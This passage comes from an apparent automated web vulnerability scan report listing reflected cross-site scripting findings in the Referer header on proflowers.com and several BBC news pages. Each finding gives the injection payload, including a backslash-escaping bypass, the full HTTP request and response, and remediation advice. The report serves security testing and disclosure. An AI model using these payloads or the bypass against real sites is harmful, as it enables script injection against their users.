   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
dCalendarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("504","504","504","298237","128","organicgglgeneric_b69d3\\";alert(1)//24889ffafa8","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-1,cnd-30,pvo-1,pbr-3,pcy-6,psk-1,poe-1,zzc-1,pjs-3,pcu-1,spg-2,mpsmediapersonalitysplit-1,ntd-1,nte-1,ntc-1,peo-1,pfp-2,phr-2,pjt-1,psv-3,
...[SNIP]...

2.169. http://products.proflowers.com/roses/Two-Dozen-Red-Roses-8096 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /roses/Two-Dozen-Red-Roses-8096

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4da9\"%3balert(1)//2d638f90e8d was submitted in the Referer HTTP header. This input was echoed as b4da9\\";alert(1)//2d638f90e8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /roses/Two-Dozen-Red-Roses-8096 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b4da9\"%3balert(1)//2d638f90e8d

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=efaxkkuklsfoqesulvyjc0z1; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=efaxkkuklsfoqesulvyjc0z1; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pjt-1,cnd-31,pvo-2,pbr-4,psk-1,pps-2,poe-1,zzc-1,pjs-1,pcu-1,pfl-2,mpsmediapersonalitysplit-1,ntd-2,nte-1,ntc-1,peo-1,pfp-1,phr-2,zza-1,psv-3,nta-1,ntb-1,pmo-1,ppr-1,spg-2,xpc-1,psr-1,pcy-8,zzb-2,gfr-2,apg-1,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:56:06 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:56:06 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=63; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:56:06 GMT; path=/
Set-Cookie: PFC_BrowserId=e5b7ad98-a6f7-4da6-84ba-7375ec0b13ee; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=8096&12/16/2010 11:56:07 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:56:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:56:07 GMT
Connection: close
Content-Length: 162530


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
CalendarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("8096","8096","8096","51335","63","organicgglgeneric_b4da9\\";alert(1)//2d638f90e8d","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pfl-2,cnd-31,pvo-2,pbr-4,pcy-8,psk-1,poe-1,zzc-1,pjs-1,pcu-1,spg-2,mpsmediapersonalitysplit-1,ntd-2,nte-1,ntc-1,peo-1,pfp-1,phr-2,pjt-1,psv-3,
...[SNIP]...

2.170. http://www.bbc.co.uk/go/homepage/i/int/br/ent/head/t/-/entertainment/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/homepage/i/int/br/ent/head/t/-/entertainment/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12ce8'-alert(1)-'4439ec4a76f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/homepage/i/int/br/ent/head/t/-/entertainment/ HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=12ce8'-alert(1)-'4439ec4a76f

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:30:33 GMT
Keep-Alive: timeout=10, max=723
Expires: Thu, 16 Dec 2010 19:30:33 GMT
Connection: close
Content-Length: 57182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527833000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=12ce8'-alert(1)-'4439ec4a76f',
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '10072371',
       assetType: 'inde
...[SNIP]...

2.171. http://www.bbc.co.uk/news/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a28fe'-alert(1)-'474f01a1e66 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/ HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=a28fe'-alert(1)-'474f01a1e66

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:54 GMT
Keep-Alive: timeout=10, max=738
Expires: Thu, 16 Dec 2010 19:27:54 GMT
Connection: close
Content-Length: 93405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527674000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=a28fe'-alert(1)-'474f01a1e66',
       section: 'front-page',
       sectionPath: '/Front page',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '10263779',
       assetType: 'index',
       uri: '/news/',
   
...[SNIP]...

2.172. http://www.bbc.co.uk/news/business-12005593 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12005593

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d00a'-alert(1)-'fc97e52050f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12005593 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=2d00a'-alert(1)-'fc97e52050f

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:12 GMT
Keep-Alive: timeout=10, max=798
Expires: Thu, 16 Dec 2010 19:28:12 GMT
Connection: close
Content-Length: 69661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527692000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=2d00a'-alert(1)-'fc97e52050f',
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12005593',
       assetType: 'story',
       uri: '/news/business-
...[SNIP]...

2.173. http://www.bbc.co.uk/news/business-12006544 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12006544

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6978'-alert(1)-'a22ac77b214 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12006544 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=d6978'-alert(1)-'a22ac77b214

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:29 GMT
Keep-Alive: timeout=10, max=745
Expires: Thu, 16 Dec 2010 19:28:29 GMT
Connection: close
Content-Length: 56468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527709000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=d6978'-alert(1)-'a22ac77b214',
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12006544',
       assetType: 'story',
       uri: '/news/business-
...[SNIP]...

2.174. http://www.bbc.co.uk/news/business-12006764 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12006764

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6886a'-alert(1)-'a8b738531d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12006764 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=6886a'-alert(1)-'a8b738531d9

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:29 GMT
Keep-Alive: timeout=10, max=695
Expires: Thu, 16 Dec 2010 19:28:29 GMT
Connection: close
Content-Length: 70246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527709000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=6886a'-alert(1)-'a8b738531d9',
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12006764',
       assetType: 'story',
       uri: '/news/business-
...[SNIP]...

2.175. http://www.bbc.co.uk/news/business-12006835 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12006835

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9736f'-alert(1)-'615e4470eb5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12006835 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=9736f'-alert(1)-'615e4470eb5

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:38 GMT
Keep-Alive: timeout=10, max=576
Expires: Thu, 16 Dec 2010 19:28:38 GMT
Connection: close
Content-Length: 61493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527718000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=9736f'-alert(1)-'615e4470eb5',
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12006835',
       assetType: 'story',
       uri: '/news/business-
...[SNIP]...

2.176. http://www.bbc.co.uk/news/business-12007016 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12007016

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a0c3'-alert(1)-'430ae6fef43 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12007016 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=2a0c3'-alert(1)-'430ae6fef43

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:31 GMT
Keep-Alive: timeout=10, max=727
Expires: Thu, 16 Dec 2010 19:28:31 GMT
Connection: close
Content-Length: 65700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527711000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=2a0c3'-alert(1)-'430ae6fef43',
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12007016',
       assetType: 'story',
       uri: '/news/business-
...[SNIP]...

2.177. http://www.bbc.co.uk/news/business-12008023 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12008023

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c33f3'-alert(1)-'43e54c12d15 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12008023 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=c33f3'-alert(1)-'43e54c12d15

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:28 GMT
Keep-Alive: timeout=10, max=798
Expires: Thu, 16 Dec 2010 19:28:28 GMT
Connection: close
Content-Length: 72865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527708000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=c33f3'-alert(1)-'43e54c12d15',
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12008023',
       assetType: 'story',
       uri: '/news/business-
...[SNIP]...

2.178. http://www.bbc.co.uk/news/business-12013062 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12013062

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47a95'-alert(1)-'ada5cd206d2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12013062 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=47a95'-alert(1)-'ada5cd206d2

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:33 GMT
Keep-Alive: timeout=10, max=599
Expires: Thu, 16 Dec 2010 19:28:33 GMT
Connection: close
Content-Length: 64975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527713000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=47a95'-alert(1)-'ada5cd206d2',
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12013062',
       assetType: 'story',
       uri: '/news/business-
...[SNIP]...

2.179. http://www.bbc.co.uk/news/business/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b69b'-alert(1)-'f78dd7f4be6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business/ HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
